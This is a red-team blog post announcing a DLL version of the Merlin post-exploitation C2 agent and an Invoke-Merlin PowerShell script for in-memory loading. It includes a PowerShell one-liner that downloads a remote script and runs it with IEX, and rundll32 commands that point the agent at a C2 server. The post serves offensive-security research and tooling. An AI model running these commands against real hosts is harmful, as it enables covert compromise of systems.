Early bird registration for SO-CON 2026 is now open!  Register Now

🧙‍ Merlin Adds DLL Agent & PowerShell Invoke-Merlin Script

Mar 14 2018
Share
By: Russel Van Tuyl • 4 min read

tl;dr Merlin now ships with an Agent DLL to enable support for TTPs that leverage a DLL. The DLL has also been embedded in an Invoke-Merlin.ps1 for in-memory execution to stay off Disk.

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang .Go is powerful because you can write one program and cross-compile it to many other platforms. One of my original goals with Merlin was to create a DLL to facilitate in-memory loading. In fact, this is one of the reasons why it took so long for a public release because I wasn’t able to get it figured out. After building a decent foundation and releasing Merlin to the public, I wanted to come back to generating a DLL. I ran across this repository where the author demonstrated how to generate a DLL from Go. In short, you have to export a function and then generate a C archive and header file using the go build -buildmode=c-archive command. Following this, you need a simple C file that merely executes the exported command. Finish up by compiling the C file with GCC and voilà, you have a DLL file. Additional information on how to compile the DLL can be found in the README.

Dynamic Link Library (DLL)

One of my favorite trade craft techniques is to load an agent or tool into memory using PowerShell to avoid putting files on the compromised host’s file system. DLL files can be a powerful way to execute code on a compromised host. Tools such as Metasploit/meterpreter and FuzzBunch can be provided with an arbitrary DLL for execution on a compromised host.

rundll32.exe

The provided DLL can be delivered and executed many different ways. One method is to use Windows’ built-in rundll32.exe program. To execute the merlin.dll file, pass the file as an argument and provide the entry point using a comma after the DLL (i.e. rundll32 merlin.dll,main) . The rundll32.exe program will load merlin.dll using the LoadLibrary() function and then call the provided entry point. By default, the DLL is hard coded to connect to https://127.0.0.1:443/. The target server can be changed by calling the exported Run function as an entry point and providing the target URL. For example rundll32 merlin.dll,Run https://yourdomain.com:443/. This works because underlying program parses the passed in arguments only when rundll32 is used.

PowerShell — Invoke-Merlin.ps1

A big thank you to Joe Bialek (@JosephBialek) and Matt Graeber for their work on Invoke-ReflectivePEInjection.ps1. This PowerShell script can be used to reflectively load a Windows DLL file into the PowerShell process or another remote process. I’ve adapted this script by embedding a Base64 encoded version of merlin.dll into the script. The original Invoke-ReflectivePEInjection functionality is still intact making this script dual use. Using Invoke-Merlin, a Merlin agent can be loaded into memory with the following command:

powershell.exe -w 1 -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ne0nd0g/merlin/dev/data/bin/powershell/Invoke-Merlin.ps1;Invoke-Merlin"

Limitations

Development of the merlin.dll is still underway. As such, a current limitation is that the DLL has no way to specify the C2 server’s URL at the time of execution when calling Invoke-Merlin.ps1. The address https://127.0.0.1:443/ is hard coded into the DLL. A simple work around is to compile the DLL with your server’s URL and to update Invoke-Merlin.ps1. The README file has detailed information on how to compile the DLL and and update Invoke-Merlin.ps1 only with 3 commands.

Build DLL From Scratch & Update Invoke-Merlin.ps1

Conclusion

Adding a DLL version of the agent is huge when it comes to working with compromised Windows hosts. This opens a lot of doors to enable using many different trade craft techniques. More prominently is the ability to reflectively load the DLL into another process using the Invoke-Merlin.ps1 script. Once you’ve exploited a host and have command execution, deliver the PowerShell script to load everything into memory without writing a file to disk. Let me know your thoughts in the comments below.

-Happy Hacking

Post Views: 78

Related Posts

View All
image for Is Kerberoasting Still a Risk When AES-256 Kerberos Encryption Is Enabled?

Research & Tradecraft

Is Kerberoasting Still a Risk When AES-256 Kerberos Encryption Is Enabled?

TL;DR Kerberoasting is fundamentally a weak password problem. Stronger encryption slows down cracking, but it doesn’t...

By: Elad Shamir
Oct 21, 2025 • 4 min read
Read Post
image for The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique

Research & Tradecraft

The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique

TL;DR – After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog...

By: Logan Goins
Oct 20, 2025 • 13 min read
Read Post
image for PingOne Attack Paths

Research & Tradecraft

PingOne Attack Paths

TL;DR: You can use PingOneHound in conjunction with BloodHound Community Edition to discover, analyze, execute, and...

By: Andy Robbins
Oct 20, 2025 • 15 min read
Read Post